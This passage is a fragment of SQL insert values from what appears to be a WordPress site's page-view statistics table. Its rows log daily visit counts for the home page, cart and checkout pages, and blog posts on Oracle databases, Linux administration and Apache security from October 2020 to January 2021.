(582,'/index.php/2020/02/02/backup-restore-progress/','post','2020-10-10',3,64),
(583,'/index.php/2020/02/02/database-startup-error-fatal-ni-connect-error-12547/','post','2020-10-10',3,60),
(584,'/index.php/2020/02/02/impdp-errors-ora-02374-ora-12899/','post','2020-10-10',3,56),
(585,'/','home','2020-10-11',21,0),
(586,'/index.php/about-me/','page','2020-10-11',1,51),
(587,'/','home','2020-10-12',26,0),
(588,'/','home','2020-10-13',39,0),
(589,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-10-13',2,150),
(590,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2020-10-13',1,305),
(591,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-10-13',1,110),
(592,'/','home','2020-10-14',72,0),
(593,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-10-14',2,110),
(594,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-10-14',1,150),
(595,'/','home','2020-10-15',44,0),
(596,'/','home','2020-10-16',47,0),
(597,'/','home','2020-10-17',41,0),
(598,'/index.php/about-me/','page','2020-10-17',9,51),
(599,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2020-10-17',2,305),
(600,'/','home','2020-10-18',21,0),
(601,'/index.php/about-me/','page','2020-10-18',1,51),
(602,'/','home','2020-10-19',55,0),
(603,'/index.php/2020/02/02/backup-restore-progress/','post','2020-10-19',3,64),
(604,'/index.php/about-me/','page','2020-10-19',1,51),
(605,'/','home','2020-10-20',38,0),
(606,'/index.php/2020/02/02/impdp-errors-ora-02374-ora-12899/','post','2020-10-20',2,56),
(607,'/','home','2020-10-21',24,0),
(608,'/','home','2020-10-22',25,0),
(609,'/','home','2020-10-23',19,0),
(610,'/','home','2020-10-24',32,0),
(611,'/index.php/about-me','page','2020-10-24',2,51),
(612,'/','home','2020-10-25',72,0),
(613,'/','home','2020-10-26',37,0),
(614,'/index.php/about-me/','page','2020-10-26',1,51),
(615,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2020-10-26',1,104),
(616,'/','home','2020-10-27',55,0),
(617,'/index.php/about-me/','page','2020-10-27',6,51),
(618,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2020-10-27',8,305),
(619,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-10-27',7,150),
(620,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-10-27',6,110),
(621,'/index.php/2020/02/02/impdp-errors-ora-02374-ora-12899/','post','2020-10-27',1,56),
(622,'/','home','2020-10-28',32,0),
(623,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-10-28',2,110),
(624,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2020-10-28',1,305),
(625,'/','home','2020-10-29',43,0),
(626,'/index.php/2020/02/02/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2020-10-29',1,27),
(627,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2020-10-29',1,305),
(628,'/','home','2020-10-30',57,0),
(629,'/index.php/about-me/','page','2020-10-30',9,51),
(630,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2020-10-30',2,305),
(631,'/','home','2020-10-31',41,0),
(632,'/index.php/about-me/','page','2020-10-31',1,51),
(633,'/index.php/2020/02/02/database-startup-error-fatal-ni-connect-error-12547/','post','2020-10-31',1,60),
(634,'/','home','2020-11-01',45,0),
(635,'/','home','2020-11-02',34,0),
(636,'/','home','2020-11-03',28,0),
(637,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-11-03',2,110),
(638,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2020-11-03',3,312),
(639,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-11-03',2,97),
(640,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-11-03',1,150),
(641,'/','home','2020-11-04',33,0),
(642,'/','home','2020-11-05',29,0),
(643,'/index.php/about-me/','page','2020-11-05',1,51),
(644,'/','home','2020-11-06',23,0),
(645,'/index.php/2020/02/02/rebuild-and-reorganize-all-indexes-within-a-database/','post','2020-11-06',1,66),
(646,'/','home','2020-11-07',20,0),
(647,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-11-07',1,150),
(648,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-11-07',1,97),
(649,'/','home','2020-11-08',36,0),
(650,'/','home','2020-11-09',39,0),
(651,'/index.php/about-me/','page','2020-11-09',2,51),
(652,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-11-09',1,97),
(653,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2020-11-09',1,104),
(654,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-11-09',1,110),
(655,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-11-09',1,150),
(656,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2020-11-09',1,305),
(657,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2020-11-09',2,312),
(658,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2020-11-09',1,68),
(659,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2020-11-10',2,312),
(660,'/','home','2020-11-10',32,0),
(661,'/index.php/about-me/','page','2020-11-10',1,51),
(662,'/','home','2020-11-11',26,0),
(663,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-11-11',1,150),
(664,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-11-11',1,97),
(665,'/','home','2020-11-12',52,0),
(666,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2020-11-12',1,312),
(667,'/','home','2020-11-13',28,0),
(668,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2020-11-13',10,312),
(669,'/index.php/about-me/','page','2020-11-13',12,51),
(670,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-11-13',1,150),
(671,'/','home','2020-11-14',25,0),
(672,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2020-11-14',2,68),
(673,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2020-11-14',9,104),
(674,'/','home','2020-11-15',28,0),
(675,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2020-11-15',1,312),
(676,'/','home','2020-11-16',22,0),
(677,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2020-11-16',1,312),
(678,'/','home','2020-11-17',30,0),
(679,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2020-11-17',3,312),
(680,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-11-17',1,150),
(681,'/','home','2020-11-18',25,0),
(682,'/','home','2020-11-19',37,0),
(683,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2020-11-19',1,312),
(684,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-11-19',1,150),
(685,'/','home','2020-11-20',18,0),
(686,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-11-20',2,110),
(687,'/','home','2020-11-21',28,0),
(688,'/index.php/about-me/','page','2020-11-21',2,51),
(689,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2020-11-21',1,312),
(690,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-11-21',1,110),
(691,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2020-11-21',1,305),
(692,'/index.php/2020/02/02/backup-restore-progress/','post','2020-11-21',1,64),
(693,'/','home','2020-11-22',49,0),
(694,'/index.php/about-me/','page','2020-11-22',2,51),
(695,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2020-11-22',3,312),
(696,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2020-11-22',1,305),
(697,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-11-22',1,150),
(698,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-11-22',1,110),
(699,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2020-11-22',1,104),
(700,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-11-22',1,97),
(701,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2020-11-22',1,68),
(702,'/','home','2020-11-23',47,0),
(703,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2020-11-23',4,312),
(704,'/','home','2020-11-24',49,0),
(705,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2020-11-24',1,312),
(706,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-11-24',1,150),
(707,'/','home','2020-11-25',48,0),
(708,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2020-11-25',2,68),
(709,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-11-25',2,110),
(710,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-11-25',3,97),
(711,'/index.php/about-me/','page','2020-11-25',1,51),
(712,'/','home','2020-11-26',32,0),
(713,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2020-11-26',3,312),
(714,'/','home','2020-11-27',31,0),
(715,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-11-27',1,150),
(716,'/','home','2020-11-28',23,0),
(717,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2020-11-28',1,312),
(718,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-11-28',1,150),
(719,'/','home','2020-11-29',18,0),
(720,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2020-11-29',1,312),
(721,'/','home','2020-11-30',157,0),
(722,'/','home','2020-12-01',6,0),
(723,'/','home','2020-12-02',10,0),
(724,'/','home','2020-12-03',11,0),
(725,'/','home','2020-12-04',28,0),
(726,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-12-04',2,110),
(727,'/','home','2020-12-05',23,0),
(728,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2020-12-05',2,104),
(729,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-12-06',1,150),
(730,'/','home','2020-12-06',20,0),
(731,'/','home','2020-12-07',66,0),
(732,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-12-07',2,150),
(733,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-12-07',4,110),
(734,'/','home','2020-12-08',22,0),
(735,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-12-08',2,110),
(736,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2020-12-08',1,312),
(737,'/','home','2020-12-09',39,0),
(738,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2020-12-09',1,305),
(739,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-12-09',2,97),
(740,'/index.php/about-me/','page','2020-12-09',1,51),
(741,'/','home','2020-12-10',18,0),
(742,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-12-10',1,97),
(743,'/','home','2020-12-11',29,0),
(744,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2020-12-11',1,305),
(745,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device','post','2020-12-11',7,312),
(746,'/','home','2020-12-12',30,0),
(747,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-12-12',3,97),
(748,'/index.php/about-me/','page','2020-12-12',2,51),
(749,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2020-12-12',1,312),
(750,'/','home','2020-12-13',18,0),
(751,'/','home','2020-12-14',54,0),
(752,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-12-14',6,150),
(753,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2020-12-14',1,312),
(754,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2020-12-14',1,305),
(755,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-12-14',3,97),
(756,'/','home','2020-12-15',30,0),
(757,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-12-15',5,110),
(758,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-12-15',1,150),
(759,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2020-12-15',1,312),
(760,'/','home','2020-12-16',31,0),
(761,'/index.php/about-me/','page','2020-12-16',1,51),
(762,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-12-16',2,110),
(763,'/','home','2020-12-17',28,0),
(764,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2020-12-17',7,312),
(765,'/index.php/about-me/','page','2020-12-17',11,51),
(766,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-12-17',5,110),
(767,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-12-17',1,97),
(768,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2020-12-17',1,104),
(769,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-12-17',1,150),
(770,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2020-12-17',1,305),
(771,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2020-12-17',1,68),
(772,'/index.php/2020/02/02/database-startup-error-fatal-ni-connect-error-12547/','post','2020-12-17',1,60),
(773,'/index.php/2020/02/02/rebuild-and-reorganize-all-indexes-within-a-database/','post','2020-12-17',1,66),
(774,'/index.php/2020/02/02/backup-restore-progress/','post','2020-12-17',1,64),
(775,'/','home','2020-12-18',21,0),
(776,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-12-18',4,150),
(777,'/index.php/2020/02/02/database-startup-error-fatal-ni-connect-error-12547/','post','2020-12-18',1,60),
(778,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-12-18',1,110),
(779,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2020-12-18',1,305),
(780,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2020-12-18',1,312),
(781,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2020-12-18',1,104),
(782,'/index.php/2020/02/02/rebuild-and-reorganize-all-indexes-within-a-database/','post','2020-12-18',3,66),
(783,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-12-18',1,97),
(784,'/index.php/about-me/','page','2020-12-18',1,51),
(785,'/','home','2020-12-19',32,0),
(786,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-12-19',7,97),
(787,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-12-19',3,110),
(788,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2020-12-19',1,68),
(789,'/','home','2020-12-20',23,0),
(790,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-12-20',1,150),
(791,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2020-12-20',1,68),
(792,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2020-12-20',1,312),
(793,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2020-12-21',1,68),
(794,'/','home','2020-12-21',18,0),
(795,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-12-21',1,150),
(796,'/index.php/about-me/','page','2020-12-21',2,51),
(797,'/','home','2020-12-22',31,0),
(798,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2020-12-22',4,68),
(799,'/index.php/about-me/','page','2020-12-22',1,51),
(800,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-12-22',1,97),
(801,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2020-12-22',1,104),
(802,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-12-22',1,110),
(803,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-12-22',1,150),
(804,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2020-12-22',1,305),
(805,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2020-12-22',1,312),
(806,'/index.php/2020/02/02/database-startup-error-fatal-ni-connect-error-12547/','post','2020-12-22',1,60),
(807,'/index.php/2020/02/02/rebuild-and-reorganize-all-indexes-within-a-database/','post','2020-12-22',1,66),
(808,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2020-12-23',2,312),
(809,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-12-23',1,150),
(810,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2020-12-23',1,68),
(811,'/','home','2020-12-23',16,0),
(812,'/','home','2020-12-24',34,0),
(813,'/','home','2020-12-25',22,0),
(814,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2020-12-25',1,312),
(815,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2020-12-25',1,104),
(816,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2020-12-26',6,305),
(817,'/','home','2020-12-26',29,0),
(818,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2020-12-26',4,312),
(819,'/index.php/about-me/','page','2020-12-26',1,51),
(820,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-12-26',1,150),
(821,'/index.php/2020/02/02/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2020-12-26',1,27),
(822,'/','home','2020-12-27',29,0),
(823,'/','home','2020-12-28',31,0),
(824,'/','home','2020-12-29',22,0),
(825,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2020-12-29',2,305),
(826,'/','home','2020-12-30',58,0),
(827,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2020-12-30',2,312),
(828,'/index.php/2020/02/02/rebuild-and-reorganize-all-indexes-within-a-database/','post','2020-12-30',3,66),
(829,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-12-30',2,110),
(830,'/index.php/product/oracle_core_essential_internals_for_dbas_and_developers/','product','2020-12-30',1,323),
(831,'/index.php/about-me/','page','2020-12-30',1,51),
(832,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-12-30',1,150),
(833,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-12-31',3,110),
(834,'/','home','2020-12-31',20,0),
(835,'/','home','2021-01-01',23,0),
(836,'/index.php/my-account/','page','2021-01-01',6,322),
(837,'/index.php/about-me/','page','2021-01-01',6,51),
(838,'/index.php/cart/','page','2021-01-01',10,320),
(839,'/index.php/checkout/','page','2021-01-01',4,321),
(840,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-01-01',5,312),
(841,'/index.php/product/oracle_core_essential_internals_for_dbas_and_developers/','product','2021-01-01',1,323),
(842,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-01-01',18,150),
(843,'/','home','2021-01-02',32,0),
(844,'/index.php/about-me/','page','2021-01-02',1,51),
(845,'/index.php/cart/','page','2021-01-02',2,320),
(846,'/index.php/checkout/','page','2021-01-02',1,321),
(847,'/index.php/my-account/','page','2021-01-02',1,322),
(848,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-01-02',2,97),
(849,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-01-02',1,312),
(850,'/','home','2021-01-03',25,0),
(851,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-01-03',1,312),
(852,'/','home','2021-01-04',17,0),
(853,'/index.php/my-account/lost-password/','page','2021-01-04',1,322),
(854,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-01-04',2,97),
(855,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device','post','2021-01-04',2,312),
(856,'/','home','2021-01-05',23,0),
(857,'/index.php/about-me/','page','2021-01-05',1,51),
(858,'/index.php/cart/','page','2021-01-05',2,320),
(859,'/index.php/checkout/','page','2021-01-05',1,321),
(860,'/index.php/my-account/','page','2021-01-05',1,322),
(861,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-01-05',1,97),
(862,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-01-05',1,104),
(863,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2021-01-05',1,110),
(864,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-01-05',1,150),
(865,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2021-01-05',1,305),
(866,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2021-01-05',1,68),
(867,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-01-05',2,312),
(868,'/index.php/2020/02/02/rebuild-and-reorganize-all-indexes-within-a-database/','post','2021-01-05',1,66),
(869,'/index.php/2020/02/02/database-startup-error-fatal-ni-connect-error-12547/','post','2021-01-05',1,60),
(870,'/index.php/2020/02/02/backup-restore-progress/','post','2021-01-05',1,64),
(871,'/','home','2021-01-06',54,0),
(872,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-01-06',1,312),
(873,'/','home','2021-01-07',34,0),
(874,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-01-07',26,312),
(875,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2021-01-07',1,68),
(876,'/index.php/about-me/','page','2021-01-07',1,51),
(877,'/index.php/cart/','page','2021-01-07',2,320),
(878,'/index.php/checkout/','page','2021-01-07',1,321),
(879,'/index.php/my-account/','page','2021-01-07',1,322),
(880,'/','home','2021-01-08',26,0),
(881,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-01-08',3,97),
(882,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-01-08',1,104),
(883,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-01-08',4,312),
(884,'/','home','2021-01-09',25,0),
(885,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device','post','2021-01-09',2,312),
(886,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2021-01-09',1,68),
(887,'/index.php/my-account/lost-password/','page','2021-01-09',2,322),
(888,'/','home','2021-01-10',29,0),
(889,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2021-01-10',1,305),
(890,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-01-10',1,312),
(891,'/','home','2021-01-11',21,0),
(892,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-01-11',1,150),
(893,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2021-01-11',3,305),
(894,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-01-11',1,312),
(895,'/','home','2021-01-12',40,0),
(896,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2021-01-12',3,110),
(897,'/index.php/checkout/','page','2021-01-12',1,321),
(898,'/index.php/about-me/','page','2021-01-12',2,51),
(899,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-01-12',7,312),
(900,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2021-01-12',3,68),
(901,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2021-01-12',3,305),
(902,'/index.php/cart/','page','2021-01-12',2,320),
(903,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-01-12',2,150),
(904,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-01-12',2,104),
(905,'/index.php/2020/02/02/rebuild-and-reorganize-all-indexes-within-a-database/','post','2021-01-12',2,66),
(906,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-01-12',1,97),
(907,'/','home','2021-01-13',22,0),
(908,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-01-13',4,312),
(909,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2021-01-13',1,68),
(910,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-01-13',2,104),
(911,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress','post','2021-01-13',3,150),
(912,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2021-01-13',2,110),
(913,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-01-14',9,312),
(914,'/','home','2021-01-14',17,0),
(915,'/index.php/2020/02/02/impdp-errors-ora-02374-ora-12899/','post','2021-01-14',1,56),
(916,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-01-14',1,150),
(917,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2021-01-14',2,110),
(918,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-01-15',3,312),
(919,'/','home','2021-01-15',30,0),
(920,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-01-15',3,150),
(921,'/index.php/about-me/','page','2021-01-15',1,51),
(922,'/index.php/cart/','page','2021-01-15',2,320),
(923,'/index.php/checkout/','page','2021-01-15',1,321),
(924,'/index.php/my-account/','page','2021-01-15',1,322),
(925,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2021-01-15',2,110),
(926,'/','home','2021-01-16',17,0),
(927,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2021-01-16',2,110),
(928,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-01-16',1,150),
(929,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-01-16',2,312),
(930,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2021-01-16',1,305),
(931,'/','home','2021-01-17',17,0),
(932,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2021-01-17',2,110),
(933,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-01-17',2,312),
(934,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2021-01-17',1,68),
(935,'/','home','2021-01-18',23,0),
(936,'/index.php/2020/02/02/rebuild-and-reorganize-all-indexes-within-a-database/','post','2021-01-18',1,66),
(937,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2021-01-18',1,305),
(938,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-01-18',1,312),
(939,'/','home','2021-01-19',13,0),
(940,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-01-19',3,312),
(941,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-01-19',1,150),
(942,'/index.php/about-me/','page','2021-01-19',1,51),
(943,'/index.php/cart/','page','2021-01-19',2,320),
(944,'/index.php/checkout/','page','2021-01-19',1,321),
(945,'/index.php/my-account/','page','2021-01-19',1,322),
(946,'/','home','2021-01-22',2,0),
(947,'/','home','2021-01-23',26,0),
(948,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2021-01-23',2,110),
(949,'/index.php/about-me/','page','2021-01-23',1,51),
(950,'/index.php/cart/','page','2021-01-23',2,320),
(951,'/index.php/checkout/','page','2021-01-23',1,321),
(952,'/index.php/my-account/','page','2021-01-23',1,322),
(953,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-01-23',3,312),
(954,'/','home','2021-01-24',23,0),
(955,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2021-01-24',2,110),
(956,'/','home','2021-01-25',27,0),
(957,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-01-25',4,312),
(958,'/','home','2021-01-26',22,0),
(959,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-01-26',2,312),
(960,'/index.php/about-me/','page','2021-01-26',1,51),
(961,'/index.php/cart/','page','2021-01-26',2,320),
(962,'/index.php/checkout/','page','2021-01-26',1,321),
